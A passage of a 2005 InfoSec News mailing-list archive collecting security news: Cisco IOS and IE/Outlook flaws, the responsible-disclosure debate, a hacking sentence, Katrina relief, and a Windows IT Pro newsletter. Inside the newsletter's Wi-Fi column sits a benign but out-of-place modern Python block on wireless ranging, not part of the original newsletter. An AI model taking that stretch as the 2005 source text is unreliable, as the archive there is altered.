"Given the recent attention to exploitation of vulnerabilities in Cisco's IOS it is possible that this issue will see attempts at exploit development in the near term," Symantec said in an advisory. Symantec and Cisco both noted that there are no known exploits or attacks that take advantage of this latest IOS vulnerability. Cisco has software fixes available to correct the problem. Cisco has had a hot summer when it comes to security. During the Black Hat and Defcon security events in July, researcher Michael Lynn demonstrated he could gain control of a Cisco router by exploiting a known security flaw in IOS. The operating system had until then been perceived as impervious to such attacks. Previous Next Cisco and Internet Security Systems--Lynn's employer--had agreed to pull the presentation, but researcher Lynn quit his job and gave the talk anyway. Cisco and ISS sued Lynn after his presentation and hackers rallied behind the researcher. The vulnerability disclosed on Wednesday doesn't affect all versions of IOS, Cisco said. Furthermore, the vulnerability exists only if the Firewall Authentication Proxy for FTP and Telnet Sessions is in use, Cisco said. That component of IOS handles authentication requests for file transfer and telnet sessions. Affected are those devices running IOS versions 12.2ZH and 12.2ZL, 12.3, 12.3T, 12.4 and 12.4T, Cisco said. Users can log on to their Cisco device and enter the "show version" command to determine which version of IOS it is running, Cisco said. The company rates the issue as a "medium" urgency. Symantec advises users who can't install the patch immediately to disable the Firewall Authentication Proxy for FTP and Telnet Sessions or limit access to the service to trusted hosts and networks. 
From isn at c4i.org Thu Sep 8 02:37:20 2005
From: isn at c4i.org (InfoSec News)
Date: Thu Sep 8 02:47:07 2005
Subject: [ISN] Agencies' disaster recovery plans get a real-world test
Message-ID:

http://www.govexec.com/story_page.cfm?articleid=32162

By Karen Rutzick
krutzick @ govexec.com
September 7, 2005

A few months before Hurricane Katrina suspended government operations in New Orleans and brought tragedy to the Gulf Coast, the Office of Personnel Management asked agencies nationwide if they were prepared for a natural disaster. The answer, from the 85 agencies that responded to OPM's 2005 Emergency Preparedness Survey, was a resounding yes.

All 15 cabinet-level departments responded to the survey as well as many smaller agencies, including the Nuclear Regulatory Commission, Small Business Administration and Federal Reserve Board. OPM said the results of the survey, conducted in April, "reflect very high levels of emergency preparedness."

According to the agencies surveyed, they were ready to take care of their own in the event of a disaster, such as Katrina. The idea, according to OPM, was for agencies to "be able to maintain business continuity" and keep running the country, even during times of disaster.

The survey's questions were based on the recommended minimum criteria agencies should meet for emergency preparedness. More than 90 percent of the agencies surveyed said their facilities had an up-to-date Occupant Emergency Plan. An OEP lays out agency guidelines in terms of designating emergency personnel, contingency work plans, evacuation procedures and more. More than 95 percent of agencies said their facilities had conducted evacuation drills in the past year. The same percentage said they had designated emergency personnel to serve as points of contact and leaders.

The Agriculture Department's National Finance Center in New Orleans had put in place many emergency preparedness procedures for employees, according to spokesman Ed Loyd.
The center had an OEP, had conducted evacuation drills at the facility, had distributed emergency guides to employees and had a contingency work plan in place before the hurricane hit, he said.

While the agencies that responded appeared to be highly prepared for immediate disaster response, such as keeping evacuation routes clearly marked, some of their longer-term emergency plans were weaker. As flooding keeps the city indefinitely closed, Hurricane Katrina highlights the need for long-term contingency plans.

Additionally, the survey reported that of the participating agencies:

* 57.6 percent had "prearranged agreements to transfer work to other agency locations;"
* 63.5 percent had "telework capability in place from home or telecenter;"
* 65.9 percent had "arrangements to temporarily conduct operations from other agency space;"
* 75.3 percent had "plans to notify agency customers/clients of temporary alternative arrangements."

The Interior Department's Minerals Management Service, which did not individually participate in OPM's survey (though Interior as a whole did), has several regional offices along the Gulf Coast. The MMS, according to spokesman Gary Strasburg, did have a contingency plan for long-term operations, which the agency's offices practiced every year. A continuity of operations plan team set up a contingency office in Houston, and was "transferring regional office operations and a limited number of staff" to the new location as a result of damage to offices from the hurricane. Strasburg said employees had practiced using the Houston location as an emergency center and actually went there and set it up every year.

In 2004, OPM provided training to agency representatives on improving emergency preparedness. OPM said these sessions were meant to focus on emergency drills and the use of telework as areas in need of improvement.
From isn at c4i.org Thu Sep 8 02:37:40 2005
From: isn at c4i.org (InfoSec News)
Date: Thu Sep 8 02:47:41 2005
Subject: [ISN] Ex-Student Sentenced in UT Computer Hacking Case
Message-ID:

http://www.woai.com/news/cyberstuff/story.aspx?content_id=E6CD0693-ED79-418F-B90D-0A8B149B5B35

9/7/2005

A former University of Texas at Austin student has been sentenced to five years of probation and ordered to pay more than $170,000 in restitution for hacking into the school's computer system and taking Social Security numbers and other personal information from tens of thousands of people.

Christopher Andrew Phillips, 22, was also prohibited from accessing the Internet, except under approval and supervision from his probation officer and only for school or work, U.S. Attorney Johnny Sutton said in a news release Tuesday. "He found out the hard way that breaking into someone else's computer is not a joke," Sutton said in the release.

A federal jury found him guilty in June of damaging the university's computer system and illegally possessing almost 40,000 Social Security numbers. The jury acquitted Phillips of the two most serious charges against him, rejecting prosecutors' claims that he intended to profit from the Social Security numbers and from the financial data of other people that was found on his computer in January 2003.

From isn at c4i.org Thu Sep 8 02:38:02 2005
From: isn at c4i.org (InfoSec News)
Date: Thu Sep 8 02:48:16 2005
Subject: [ISN] Bug hunters, software firms in uneasy alliance
Message-ID:

http://news.zdnet.com/2100-1009_22-5846019.html

By Joris Evers, and Marguerite Reardon, CNET News.com
Published on ZDNet News: September 6, 2005

Tom Ferris is walking a fine line. He could be Microsoft's friend or foe.

Ferris, an independent security researcher in Mission Viejo, Calif., found what he calls a serious vulnerability in Microsoft's Internet Explorer Web browser. He reported it to the software giant on Aug.
14 via the "secure@microsoft.com" e-mail address and has since exchanged several e-mail messages with a Microsoft researcher. Up to that point, Ferris did everything according to Microsoft's "responsible disclosure" guidelines, which call for bug hunters to delay the announcement of security holes until some time after the company has provided a fix. That way, people who use flawed products are protected from attack, the argument goes. Last weekend, however, Ferris came close to running afoul of those guidelines by posting a brief description of the bug on his Security Protocols Web site and talking to the media about the flaw. So far, the move has done little more than raise some eyebrows at Microsoft. "I am walking a fine line, but I am doing it very carefully because I am not disclosing actual vulnerability details," Ferris said. "I do this to inform users that flaws still do exist in IE...I don't like it that Microsoft tries to give users a nice warm feeling that they are disclosing everything researchers report to them." At issue is the push for "responsible disclosure" of software flaws by many industry players, including titans such as Microsoft, Oracle and Cisco Systems. Microsoft publicly chastises security researchers who don't follow its rules. Also, those researchers won't get credit for their flaw discovery in Microsoft's security bulletin, which is published when the company releases a patch. Because Ferris did not disclose any actual vulnerability details, he's still on Microsoft's good side, a company representative said. While many software makers promote responsible disclosure, it isn't universally backed by the security community. Critics say it could make security companies lazy in patching. Full disclosure of flaws is better, they say, and turns up the heat on software makers to protect their customers as soon as possible. How long is too long? "Microsoft obviously takes way too long to fix flaws," Ferris said. 
"All researchers should follow responsible disclosure guidelines, but if a vendor like Microsoft takes six months to a year to fix a flaw, a researcher has every right to release the details." By that time someone else, perhaps a malicious person, may also have found the same flaw and might be using it to attack users, Ferris said. Often lambasted for bugs in its products, Microsoft is doing its best to win the respect of the security community. The company has "community outreach experts" who travel the world to meet with security researchers, hosts parties at security events and plans to host twice-annual "Blue Hat" events with hackers on it its Redmond, Wash., campus. At Blue Hat, hackers are invited to Microsoft's headquarters to demonstrate flaws in Microsoft's product security. "Security researchers provide a valuable service to our customers in helping us to secure our products," said Stephen Toulouse, a program manager in Microsoft's security group. "We want to get face to face with them to talk about their views on security, our views on security, and see how best we can meet to protect customers." Many companies are getting better at dealing with security researchers, said Michael Sutton, director of iDefense Labs, which deals with researchers and software makers. "The environment has definitely changed from two or three years ago, though there are vendors who are going in the opposite direction," he said. While Microsoft sometimes is still referred to as the "evil empire," it appears to be successfully wooing security researchers. "We are at the point where all the obvious things we tell Microsoft to do, they already do it," Dan Kaminsky, a security researcher who participated in Microsoft's first Blue Hat event last March, has said. Balancing act Other technology companies still struggle with hacker community relations. 
Cisco especially has managed to alienate itself from the hacker community to the extent that T-shirts with anti-Cisco slogans were selling well at this year's Defcon event. Oracle also isn't a favorite, researchers said. Cisco, along with Internet Security Systems, last month sued security researcher Michael Lynn after he gave a presentation on hacking router software at the Black Hat security conference. The company had previously tried to stop Lynn from giving his talk in the first place. "It was definitely a surprise to see Cisco's reaction," iDefense's Sutton said. "I don't think that's the best approach. I do feel that it is happening less and that vendors are realizing that we don't want to work against them, but with them." Cisco contends it doesn't have any beef with Lynn's discoveries, but instead the company is unhappy about the way he went about distributing the information to the public. "This incident violated aspects of normal protocol for dealing with security flaws," said Bob Gleichauf, CTO for Cisco's Security Technology Group. "And we are real sticklers for protocol." But it seems that there have been several instances where Cisco has had similar problems in its dealings with researchers. Early in 2004, Paul Watson discovered a flaw in the TCP/IP protocol that could be exploited on a number of networking products, including Cisco's routers. Watson said he initially e-mailed two of Cisco's engineers, who responded promptly. They were helpful and even contributed some thoughts and ideas to his research, he said. But once the issue was identified as a serious security risk by the legal team at Cisco, the tone of the communication changed, Watson said. Cisco still wanted information from Watson, but no longer responded to his queries. Watson provided Cisco with several possible methods to correct the problem. Frustrated by the lack of communication with Cisco, Watson decided to present his research at the CanSecWest Security Conference in April 2004. 
In a scenario similar to that at Black Hat, Cisco and the U.S. Department of Homeland Security asked the conference organizer to pull the talk. The request was denied. The impending talk spurred the company into action. Fixes were released a few days before the conference. However, Cisco not only provided patches, it also patented a fix for the flaw. This raised fears that Cisco might charge for the fix, which also affected other vendors, although Cisco did not. "I was shocked," Watson said in an e-mail. "It really broke my trust in them." Cisco, like other software makers, wants security researchers to report flaws privately and have time to patch before disclosure, but Cisco took advantage of this period to apply for a patent, he said. Playing it smart A similar situation played out about a year later. Cisco tried to patent a fix to a flaw in the ICMP protocol that was discovered by Fernando Gont. The researcher outsmarted Cisco by documenting his discovery and the fix, and also by sharing the information privately with the open-source community and the Internet Engineering Task Force, a standards organization. Mary Ann Davidson, chief security officer at Oracle, sees security researchers who threaten vendors with disclosure of bugs as a problem, she wrote in a recent perspective piece on News.com. "The reality is that most vendors are trying to do better in vulnerability handling. Most don't need threats to do so," Davidson said. Alexander Kornbrust specializes in security of Oracle products. He went public with details on six security vulnerabilities in Oracle software in July, about two years after he reported the bugs to the software maker and fixes still had not been provided. Oracle chided Kornbrust as irresponsible for disclosing the data. Although not entirely happy about his dealings with Oracle, Kornbrust said it is not an adversarial relationship. "Hostile is not the right expression. I did get feedback from Oracle," Kornbrust said. 
But that was only immediately after he reported the bugs. Oracle did not give Kornbrust updates on how it was addressing the problems afterwards. "Oracle supports guidelines for responsible disclosure. One of those guidelines is that the company should send out updates to the researcher. They don't," said Kornbrust, who runs Germany's Red Database Security. In the past, many hackers and security researchers outed glitches without giving much thought to the impact the disclosures would have on Internet users. Software makers have been working to provide a channel for disclosure. Several have also established patching schedules. Microsoft releases patches every second Tuesday of the month, and Oracle has a quarterly schedule. Still, the debate on responsible disclosure rages. Recently the French Security Incident Response Team, or FrSIRT, was the subject of discussion on a popular security mailing list. FrSIRT, formerly known as K-Otic, releases details on vulnerabilities and also publishes exploit code that could help attackers. Sometimes the holes aren't yet patched. Other than FrSIRT selling its service, what good can such publishing do? critics have asked. "With our dependency on IT systems, responsible disclosure is of paramount importance," said Howard Schmidt, an independent security consultant who has served as cybersecurity adviser to the White House and security executive at Microsoft and eBay. Technology companies that are not responsive to security researchers do pose a problem, Schmidt said. He suggests that the government, specifically the US Computer Emergency Readiness Team (the Department of Homeland Security's Internet security agency), could act as an intermediary. "And then perhaps the government could put some pressure on (technology companies)," he said. 
From isn at c4i.org Thu Sep 8 02:38:19 2005
From: isn at c4i.org (InfoSec News)
Date: Thu Sep 8 02:48:45 2005
Subject: [ISN] eEye spots another gaping hole in Outlook and Explorer
Message-ID:

http://www.techworld.com/security/news/index.cfm?NewsID=4353

By Matthew Broersma
Techworld
07 September 2005

Microsoft says it is investigating a new high-risk security flaw affecting Outlook and Internet Explorer, adding to the growing number of serious bugs that have been reported to the vendor but remain unfixed.

eEye Digital Security disclosed the new bug, a buffer-overflow flaw potentially allowing attackers to execute malicious code on a system, last week. The bug affects default installations of Outlook, Outlook Express and Internet Explorer on Windows 2000 and Windows XP with Service Pack 1 installed, although eEye said additional versions of Windows may also be affected.

Microsoft said it is investigating the problem, and may issue a fix in the future. The company said it isn't aware of any exploits using the flaw.

In order to minimise the danger from unpatched bugs, eEye doesn't disclose more than the bare minimum of information on a flaw until it has been patched or the vendor has tested a workaround. However, the number of unpatched high-risk flaws eEye and other vendors have reported in Microsoft products is substantial, with some dating back several months. Security researchers usually urge vendors to patch flaws within a few weeks of the initial report, arguing that bugs can be detected by potential attackers just as easily as by legitimate researchers.

eEye alone says it has nine bug reports awaiting patches from Microsoft, the oldest of which dates from the end of March. Most are high-risk, affecting software such as Internet Explorer, Outlook and system-level software. Software from Macromedia and RealNetworks also has a total of three unpatched, high-risk flaws, according to eEye.
From isn at c4i.org Thu Sep 8 02:39:00 2005
From: isn at c4i.org (InfoSec News)
Date: Thu Sep 8 02:49:54 2005
Subject: [ISN] Security UPDATE -- A Peek into the Future of Wi-Fi Security -- September 7, 2005
Message-ID:

====================

1. In Focus: A Peek into the Future of Wi-Fi Security

2. Security News and Features
   - Recent Security Vulnerabilities
   - Another IE Flaw Surfaces
   - Long Registry Keys Can Help Hide Malware

3. Security Toolkit
   - Security Matters Blog
   - FAQ
   - Security Forum Featured Thread

4. New and Improved
   - Desktop Spyware Protection for SMBs

====================

==== 1. In Focus: A Peek into the Future of Wi-Fi Security ====
by Mark Joseph Edwards, News Editor, mark at ntsecurity / net

Today, Wi-Fi networks are secured by using a number of methods.
Those methods protect Access Points (APs) and clients from a wide variety of attacks: connection hijacking, unauthorized connections to legitimate APs, Denial of Service (DoS) attacks, address spoofing, attempts at network bridging, rogue APs, man-in-the-middle attacks, and the list goes on. Any sort of wireless communication is more difficult to defend than a wired network. One main reason is that radio waves propagate. Unless your network has extremely sophisticated transmitters, antennas, and wave propagation limiters, controlling the extent to which your waves are traveling is very difficult. If intruders can pick up your Wi-Fi signals, they have some amount of access to the communication taking place. But encryption helps protect the data being transmitted, and AP and client security systems help prevent intrusion and service disruption. A number of security solutions are designed specifically to protect wireless networks, and they work reasonably well, but there is still room for improvement. In the near future, we'll see enhancements and features added to many of those solutions, and we'll undoubtedly see new solutions come to the marketplace. At the recent Intel Developer Forum, Justin Rattner, Intel senior fellow and director of Intel's Corporate Technology Group, demonstrated some interesting new wireless networking technology that could help improve security. The technology involves wireless devices that can become aware of a person's physical location, similar to GPS technology but without the need for orbiting satellites. The company said that its client location technology is currently accurate to within a 1-meter radius. In essence, an AP uses the new technology to determine a client's location by timing the transmission of data to and from the client. Because the rate of travel can be known, the distance between APs and clients can be calculated. 
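The timing-based ranging just described, worked through as an added example (this is not Intel's code, and the column does not give any of its implementation details): an AP measures the round trip of a probe, subtracts the client's turnaround delay, and converts the remainder to distance at the speed of light; with three APs the ranges fix a position, which generalizes the single-AP distance check. The turnaround delay, the 30-foot policy radius and the AP and client coordinates are all assumed values chosen for the demonstration.

```python
# Speed of light, metres per second; radio in air is close enough to this.
C = 299_792_458.0


def rtt_resolution_for_accuracy_ns(accuracy_m):
    """Round-trip timing resolution needed for a given ranging accuracy: each
    metre of distance adds two metres of path, so 1 m corresponds to ~6.67 ns."""
    return 2.0 * accuracy_m / C * 1e9


def distance_to_rtt_ns(distance_m, turnaround_ns):
    """Round-trip time an AP would measure for a client at distance_m, including
    the client's fixed turnaround delay. Used here only to build sample readings."""
    return 2.0 * distance_m / C * 1e9 + turnaround_ns


def rtt_to_distance_m(rtt_ns, turnaround_ns):
    """Distance implied by a measured round-trip time once the client's turnaround
    delay (assumed known from calibration) is subtracted; clamped at zero."""
    one_way_s = (rtt_ns - turnaround_ns) * 1e-9 / 2.0
    return max(0.0, one_way_s * C)


def trilaterate(aps, distances):
    """Client position (x, y) from three AP positions and their ranges: subtract
    the first range equation from the other two, leaving a 2x2 linear system
    solved by Cramer's rule."""
    (x1, y1), (x2, y2), (x3, y3) = aps
    d1, d2, d3 = distances
    a1, b1 = 2.0 * (x2 - x1), 2.0 * (y2 - y1)
    c1 = d1**2 - d2**2 - x1**2 + x2**2 - y1**2 + y2**2
    a2, b2 = 2.0 * (x3 - x1), 2.0 * (y3 - y1)
    c2 = d1**2 - d3**2 - x1**2 + x3**2 - y1**2 + y3**2
    det = a1 * b2 - a2 * b1
    if abs(det) < 1e-12:
        raise ValueError("access points are collinear; position is ambiguous")
    return (c1 * b2 - c2 * b1) / det, (a1 * c2 - a2 * c1) / det


def admit_client(rtt_ns, turnaround_ns, policy_radius_m):
    """Admission decision of the kind the column envisions: accept only clients
    whose ranged distance is within the configured radius."""
    return rtt_to_distance_m(rtt_ns, turnaround_ns) <= policy_radius_m


if __name__ == "__main__":
    TURNAROUND_NS = 1_000.0          # assumed client turnaround, not a measured figure
    POLICY_RADIUS_M = 30 * 0.3048    # 30 feet, an assumed policy radius
    for d in (5.0, 9.0, 12.0):
        rtt = distance_to_rtt_ns(d, TURNAROUND_NS)   # constructed measurement
        print(f"{d:5.1f} m -> RTT {rtt:9.2f} ns -> admitted: "
              f"{admit_client(rtt, TURNAROUND_NS, POLICY_RADIUS_M)}")
    print(f"timing resolution for 1 m accuracy: {rtt_resolution_for_accuracy_ns(1.0):.2f} ns")
    aps = [(0.0, 0.0), (20.0, 0.0), (0.0, 20.0)]
    client = (6.0, 8.0)
    ranges = [((client[0] - x) ** 2 + (client[1] - y) ** 2) ** 0.5 for x, y in aps]
    print("trilaterated position:", trilaterate(aps, ranges))
```

The resolution figure is the practical caveat: metre-level accuracy means resolving the round trip to a few nanoseconds, so any jitter in the client's turnaround shows up directly as ranging error, and a client that delays its reply looks farther away, not closer, which is the safe direction for an admission policy.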
AP antennas can play a significant role in the refinement of client location systems because the antennas can be designed to transmit signals within a specific area in a given direction. A specially designed AP antenna could allow an AP to determine where a client is located relative to the AP's position. I suspect that Intel's technology takes advantage of a somewhat unique antenna design as compared to typical AP antennas in use today.

The security of wireless networks could be greatly improved by using client location awareness. In practice, an AP could be configured to allow connections only from devices that are within 30 feet. Similarly, wireless Intrusion Detection Systems (IDSs) could be set to detect any client systems attempting communication from farther away than a predefined distance from the AP.

Of course the application of such technology isn't limited to enhanced security. During his demonstration, Rattner showed how he could be tracked in an on-stage mock-up of a home. As he moved from place to place, wireless transmission of a video broadcast was switched to the screen closest to him. However, to security administrators, this peek into the near future is most interesting because of the significant implications for improved network security.

====================

==== Sponsor: Sherpa Software ====

Gone in 30 Days: Exchange, Retention, and Regulatory Compliance
The advent of Sarbanes-Oxley, Gramm-Leach-Bliley, and assorted market-specific regulations means that you may be legally required to have an email compliance and retention policy. Download this free whitepaper now to learn general retention and compliance issues, gain an understanding of Microsoft Exchange Server's built-in archiving and compliance features and guidance on first steps to take when starting an archiving regime.
Plus - discover how to analyze trends and usage across your messaging store; implement retention policies in Exchange mailboxes, PST files (network/local), public folders and more.
http://list.windowsitpro.com/t?ctl=12DD1:4FB69

====================

==== 2. Security News and Features ====

Recent Security Vulnerabilities
If you subscribe to this newsletter, you also receive Security Alerts, which inform you about recently discovered security vulnerabilities. You can also find information about these discoveries at
http://list.windowsitpro.com/t?ctl=12DD8:4FB69

Another IE Flaw Surfaces
Tom Ferris reported a new flaw in Microsoft Internet Explorer (IE) 6.0 on fully patched Windows XP Service Pack 2 (SP2) systems. While Ferris offered few details about the problem on his Web site, the vulnerability reportedly could allow a remote intruder to install remote code and completely take over an affected system.
http://list.windowsitpro.com/t?ctl=12DE0:4FB69

Long Registry Keys Can Help Hide Malware
Last week, an interesting discovery was made regarding the Windows registry. Apparently, long keys can't be viewed or deleted by using regedit or many third-party tools designed to detect malware. Registry keys that exceed 254 characters in length are basically invisible unless the tool being used to read the registry is designed to accommodate longer keys.
http://list.windowsitpro.com/t?ctl=12DDE:4FB69

====================

==== Resources and Events ====

Avoid the 5 Major Compliance Pitfalls
Based on real-world examples, this Web seminar will help C-level executives, as well as IT directors and managers, avoid common mistakes and give their organization a head start toward ensuring a successful compliance implementation. Register today and find out how you can avoid the mistakes of others, improve IT security, and reduce the cost of continually maintaining and demonstrating compliance.
http://list.windowsitpro.com/t?ctl=12DD7:4FB69

Consolidate Your SQL Server Infrastructure
Shared data clustering is the breakthrough consolidation solution for Microsoft Windows servers. In this free Web seminar, learn how shared data clustering technology can reduce capital expenditures by at least 50 percent, improve management efficiency, reduce operational expense, ensure high availability across all SQL Server instances, and more. Find out how you can reduce the Total Cost of Ownership (TCO) for SQL Server cluster deployments by as much as 60 percent over three years. Sign up today!
http://list.windowsitpro.com/t?ctl=12DD3:4FB69

Discover SQL Server 2005 for the Enterprise. Are you prepared?
In this free, half-day event you'll learn how the top new features of SQL Server 2005 will help you create and manage large-scale, mission-critical, enterprise database applications--making your job easier. Find out how to leverage SQL Server 2005's new capabilities to best support your business initiatives. Register today!
http://list.windowsitpro.com/t?ctl=12DD6:4FB69

Roll Back Data to Any Point in Time, Not Just to the Last Snapshot or Backup
Have you ever lost data that was saved right after your last backup? Most of us have. Continuous, or real-time, backup systems provide real-time protection, but are they right for you? In this free Web seminar, you'll learn about the design principles that underlie continuous data protection solutions, how to integrate them with your existing backup infrastructure, and how best to apply continuous protection technologies to your Windows-based servers.
http://list.windowsitpro.com/t?ctl=12DD4:4FB69

Get Ready for SQL Server 2005 Roadshow in Europe
Back By Popular Demand - Get the facts about migrating to SQL Server 2005!
SQL Server experts will present real-world information about administration, development, and business intelligence to help you implement a best-practices migration to SQL Server 2005 and improve your database-computing environment. Receive a one-year membership to PASS and one-year subscription to SQL Server Magazine. Register now!
http://list.windowsitpro.com/t?ctl=12DD5:4FB69

====================

==== Featured White Paper ====

Is Your Exchange Server 2003 Environment Well Cared For?
Get the bare and necessary facts you should know to maintain your Exchange Server 2003 environment, including critical strategies for predicting and responding to failures. Plus, you'll receive useful information about implementing proactive measures, such as preventive database maintenance, to ensure that your investment is well protected.
http://list.windowsitpro.com/t?ctl=12DD2:4FB69

====================

==== 3. Security Toolkit ====

Security Matters Blog: Bam! Google Hacking Just Got Kicked Up a Notch
by Mark Joseph Edwards, http://list.windowsitpro.com/t?ctl=12DE2:4FB69

If Emeril Lagasse were a hacker, he'd probably be using the new Google mining toolset, Massive Enumeration Tool (MET). Written in the Python scripting language, MET is a collection of scripts designed to mine data from the gigantic databases stored by Google's search engine.
http://list.windowsitpro.com/t?ctl=12DDD:4FB69

FAQ
by John Savill, http://list.windowsitpro.com/t?ctl=12DE1:4FB69

Q: How can I set the default domain user profile?

Find the answer at http://list.windowsitpro.com/t?ctl=12DDF:4FB69

Security Forum Featured Thread: Rights Required to Allow Changing Directory Ownership
A forum participant writes that he's trying to use xcacls.vbs to allow his Help desk staff to change the owner on a user's home directory when it's initially created.
The command-line options he uses (listed in the Security Forum post) work fine under his account, which has Domain Admin rights, but the Help desk technicians receive an error when they run the command with the same options. He's tried giving the Help desk technicians "Take ownership" and "Restore files" rights on the file server, but that doesn't fix the problem. If you can help, join the discussion at
http://list.windowsitpro.com/t?ctl=12DD0:4FB69

====================

==== Announcements ====
(from Windows IT Pro and its partners)

Stay Up-to-Date with the Windows IT Security Newsletter
Every issue of Windows IT Security features coverage of the best security tools available and expert advice on the best way to implement security. Our expanded content includes even more fundamentals on building and maintaining a secure enterprise. In addition, paid subscribers get access to our entire online security article database (more than 1900 articles)! Subscribe today:
http://list.windowsitpro.com/t?ctl=12DDA:4FB69

VIP Monthly Online Pass = Quick Security Answers!
Sign up today for your VIP Monthly Online Pass and get 24/7 access to the entire Windows IT Security online article database, including exclusive subscriber-only content. That's a database of more than 1900 security articles to help you get all the answers you need, when you need them. Sign up now:
http://list.windowsitpro.com/t?ctl=12DDB:4FB69

====================

==== 4. New and Improved ====
by Renee Munshi, products@windowsitpro.com

Desktop Spyware Protection for SMBs
St. Bernard Software offers SpyEXPERT, an antispyware software solution for desktop computers specifically designed to meet the needs of small-to-midsized businesses (SMBs). SpyEXPERT provides a centralized management console that administrators can use to scan and clean spyware from desktops. The console includes scheduling and reporting functions.
SpyEXPERT's comprehensive database is continually updated through a variety of collaborative techniques. For more information, go to
http://list.windowsitpro.com/t?ctl=12DE5:4FB69

Tell Us About a Hot Product and Get a T-Shirt!
Have you used a product that changed your IT experience by saving you time or easing your daily burden? Tell us about the product, and we'll send you a T-shirt if we write about the product in a future Windows IT Pro What's Hot column. Send your product suggestions with information about how the product has helped you to whatshot@windowsitpro.com.

Editor's note: Share Your Security Discoveries and Get $100
Share your security-related discoveries, comments, or problems and solutions in the Windows IT Security print newsletter's Reader to Reader column. Email your contributions (500 words or less) to r2rwinitsec@windowsitpro.com. If we print your submission, you'll get $100. We edit submissions for style, grammar, and length.

====================

==== Sponsored Links ====

Argent versus MOM 2005
Download Argent Versus Microsoft Operations Manager 2005
http://list.windowsitpro.com/t?ctl=12DCF:4FB69

====================

==== Contact Us ====

About the newsletter -- letters@windowsitpro.com
About technical questions -- http://list.windowsitpro.com/t?ctl=12DE4:4FB69
About product news -- products@windowsitpro.com
About your subscription -- windowsitproupdate@windowsitpro.com
About sponsoring Security UPDATE -- salesopps@windowsitpro.com

====================

This email newsletter is brought to you by Windows IT Security, the leading publication for IT professionals securing the Windows enterprise from external intruders and controlling access for internal users. Subscribe today.
http://list.windowsitpro.com/t?ctl=12DDC:4FB69

View the Windows IT Pro privacy policy at
http://www.windowsitpro.com/AboutUs/Index.cfm?action=privacy

Windows IT Pro, a division of Penton Media, Inc.
221 East 29th Street, Loveland, CO 80538
Attention: Customer Service Department
Copyright 2005, Penton Media, Inc. All rights reserved.

From isn at c4i.org Thu Sep 8 02:37:01 2005
From: isn at c4i.org (InfoSec News)
Date: Thu Sep 8 02:50:21 2005
Subject: [ISN] Hero BOFHs needed for Katrina relief work
Message-ID:

http://www.theregister.co.uk/2005/09/07/sans_recruits_katrina_volunteers/

By John Leyden
7th September 2005

The SANS Institute - best known for helping to track hacker activity via the Internet Storm Center - is helping to recruit tech-savvy volunteers to help care for people left homeless by Hurricane Katrina.

Techies are needed to set up PCs and wireless networks at shelters and at Red Cross headquarters in Washington DC to install security software tools. The Red Cross HQ needs people who know how to tune Cisco IDS, NetIQ Manager and McAfee ePolicy Orchestrator tools.

People who live near the shelters and have experience in deploying Windows XP or Cisco systems - or Washington-based security experts - can register to help on SANS's website here [1]. SANS is collating this info and passing it on to the Red Cross.

Meanwhile SANS handler Tom Liston is verifying hurricane-related URLs to root out scam artists. Hundreds of Katrina-themed domains have been registered since the storm hit the US Gulf Coast last week.

As well as helping to recruit volunteers, SANS is also donating $100K to the Red Cross. ®

[1] http://isc.sans.org/

From isn at c4i.org Sat Sep 10 00:06:57 2005
From: isn at c4i.org (InfoSec News)
Date: Sat Sep 10 00:35:34 2005
Subject: [ISN] Security consortium offers C&A credential
Message-ID:

http://www.fcw.com/article90695-09-08-05-Web

By Florence Olsen
Sep. 8, 2005

The International Information Systems Security Certification Consortium (ISC)2 has begun certifying government employees for a professional certification and accreditation (C&A) credential that it developed in cooperation with the State Department.
Consortium officials said the new credential is timely because all federal agencies must certify and accredit major information systems and applications under the Federal Information Security Management Act (FISMA). "We felt the time was right for (ISC)2 to develop a credential to support it," said Rolf Moulton, president and interim chief executive officer of the consortium, a nonprofit group that certifies information security employees.

Security experts devised the C&A process to ensure that information systems are reasonably secure given the risks to which they are exposed. FISMA requires federal agencies to perform C&A on information systems every three years or whenever systems are significantly modified.

To qualify for the Certification and Accreditation Professional (CAP) credential, a person must have two years of direct experience doing C&A work. The person must also pass a CAP exam and subscribe to the consortium's code of ethics, according to the announcement.

Consortium officials said that W. Hord Tipton, chief information officer at the Interior Department, and Jane Scott Norris, chief information security officer at the State Department, were in the first group who passed the CAP exam. State's security experts helped (ISC)2 develop the certification exam.

To maintain their CAP credential, security employees must earn 60 hours of continuing education credits every three years, pay annual maintenance fees and abide by the consortium's code of ethics, (ISC)2 officials said.
From isn at c4i.org Sat Sep 10 00:07:12 2005
From: isn at c4i.org (InfoSec News)
Date: Sat Sep 10 00:36:08 2005
Subject: [ISN] Temperatures run high in IT health security debate
Message-ID:

http://www.computerworld.com.au/index.php/id%3B1373164455%3Bfp%3B16%3Bfpid%3B0

Michael Crawford
09/09/2005

The author of a study into firewalls prepared for general practitioners under the Broadband for Health program claims it has been dumbed down so much by federal health bureaucrats that the document is now virtually useless as an IT security guide.

The author, Dr Horst Herb, director of the Dorrigo Medical Centre in NSW, is demanding his name be stripped from the final report.

Once a systems auditor, penetration tester and mainframe security analyst for Siemens, Dr Herb spent the last five months advising the government on minimum firewall standards for GPs. Horst said he believes the government is not serious about IT security when it comes to e-health.

Although Herb's work has been published as part of the GPCG (General Practice Computing Group) Security Firewall Guidelines, he said many core technical aspects and product-specific analysis had been stripped out of the recommendations. As a result, he said, the document prepared as an IT security guide for GPs has reached the point of irrelevance.

A Department of Health and Ageing spokesperson, asked to respond to Dr Herb's allegations, said the submitted report was "overly-technical" and had to be "simplified extensively" so that GPs could understand it.

"The original document was very technical," Herb said. "But that was the whole point, to raise interest and technical understanding of what is involved for GPs. Even if the doctors were to commission out implementing firewalls they would still need to emulate skills of the person that set it up, because generally, there is no formal qualification for implementing firewalls or formal liabilities for firewalls," Herb said.
Herb also warned many IT security products are not strong enough to protect highly sensitive, personal information.

"The main problem I had was with personal firewalls, which is just software on a computer which is, in my opinion pointless in a surgery scenario because they have too many vulnerabilities - all it takes is downloading software to disable it. GPs need a dedicated firewall where no user can dabble with it," he said.

"Surgeries should not rely on basic or personal firewalls. This [detail] was edited out of the original report, mainly so [telecommunications vendors] can just push a default firewall setting as acceptable - it is just pure nonsense."

Herb said that while the strong security message was being lost on GPs as a result, he is glad some security information has been released. However, Herb is insisting his name be stripped from the report, because he does not want to be held liable for anyone considering a personal firewall as a viable IT security solution for doctors.

Since the report was published, the federal government has axed funding for GPCG, which provided IT support and advice for doctors and clinicians. It ran for eight years under an annual, million-dollar government grant.

The Department of Health and Ageing spokesperson said all doctors involved with the now defunct General Practice Computing Group considered the original document to be far too complicated. However, when it was "simplified extensively", they gave it their full endorsement. The department claims the document has since been well received by doctors, despite the GPCG being disbanded.

